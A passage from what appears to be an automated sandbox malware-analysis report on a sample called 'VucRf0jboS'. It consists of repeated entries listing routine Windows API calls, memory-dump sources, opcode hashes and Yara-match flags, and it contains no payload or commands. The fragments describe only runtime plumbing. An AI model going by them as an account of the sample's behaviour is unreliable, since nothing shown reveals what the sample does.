                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 04160544
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1084509184-0
                                                                                                                                                                                                                                      • Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                                      • Instruction ID: 6c25101d50895f277c7a8b25db726fdd47db59e4e5c7ef6163239646b3f1794d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F022323003045FEB289F399CC0A7A7B92EF8636CF0480ADF9068B640D7B1E852CA40
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,04154002,?,00000004), ref: 0415779E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                      • Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
                                                                                                                                                                                                                                      • Instruction ID: 72a19c47952256559b5b50ff8eedc051c9334b05ff0f56c4783d0386110c4e9a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3F0F631741218FBDB11AF60EC46FBE3B62DF04B10F900075FC19261A0CB715E209699
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                                      • Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                                      • Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04151C62: RtlEnterCriticalSection.NTDLL(?), ref: 04151C71
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 04157390
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                                      • Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                                      • Instruction ID: 56e507bd8a41f9797277821c774cd75c4808cc0f6b7c16ee792f8d17d6d1bf66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DF03C72A60304EFEB15EF78D885B9D7BB0EB04728F10516AE914DB2A0CB7569448B89
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                        • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1084509184-0
                                                                                                                                                                                                                                      • Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                                      • Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
                                                                                                                                                                                                                                        • Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 04160449
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1084509184-0
                                                                                                                                                                                                                                      • Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                                      • Instruction ID: 1709fb9d6a7fb0744777f48ccfd2b3c0804d014735ccbc4db163184052843ac5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8F0553630021597CB18AF3ADC8577ABF90EFC1714F46409AEE0A8B251C772E842C790
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                      • Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                                      • Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00409C12,041495DF), ref: 04149E72
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                      • Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                                      • Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                                                                                                      • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                      • Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                                                                                                      • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                      • Instruction ID: e0c4c3bdca67f8e4236c50a20bd59e8eb7d66bff12a8ae6cd6b30c39b577b7f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F451AA6170074A57EF384E7885E87BF23DA9FC6318F58098AD842CB392D709F9478366
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                                      • Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
                                                                                                                                                                                                                                      • Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
                                                                                                                                                                                                                                      • Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                      • Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                      • Instruction ID: 140a32de91a9e451739a71e124e966e91b7ebe90bc6f9b7de3b285354612174a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F491417220A0A34ADB6D463E95B807EFEE15BC22A170B17DED4F2CA1C5FF14E154D6A0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                      • Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                      • Instruction ID: 47941ac79bee044505aa1ef84e6b60ccf4ed690bbad32deb12cae9a728f66aae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8891427620A0A34AEB69467E85B403DFFE15BC26B270B07DED4F2CA1C5FF14A154E660
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                      • Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                      • Instruction ID: 98e21fc1874434f26d13b81f10f9c032423ae5d73185bb1b21a28c0b6361eefd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C391737220A0A34ADB2D467E95B443EFFE15BC26A130B07EED4F2CA5C5FF14E1649660
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                      • Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                      • Instruction ID: 76e4f348d0083da15ba83460519564423aa939c8edffc28171be5a6ce0fe3c43
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67813D7620D0A249DB2D467A95B403EFFE15BC26A170B07DEE4F6CB1C1FF24E1549A60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 041E5000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_41e5000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                      • Instruction ID: fad8b94e79f32ba2623cc75c8f41d3463bc78ccdf36d5c1880f1924c69b86a85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26113076340500AFD754DE96DCC5EB673EBEB89324B198095ED08CB316E775E841C760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                      • Instruction ID: 44157d52b0374e4f13780089e5c5ae27608567c4c3222d9340df5fb56acb8ace
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D801D472A006008FDB21CF21C854BAA37B5EBC9205F0544E4EA0697241E370B9458B80
                                                                                                                                                                                                                                      Uniqueness

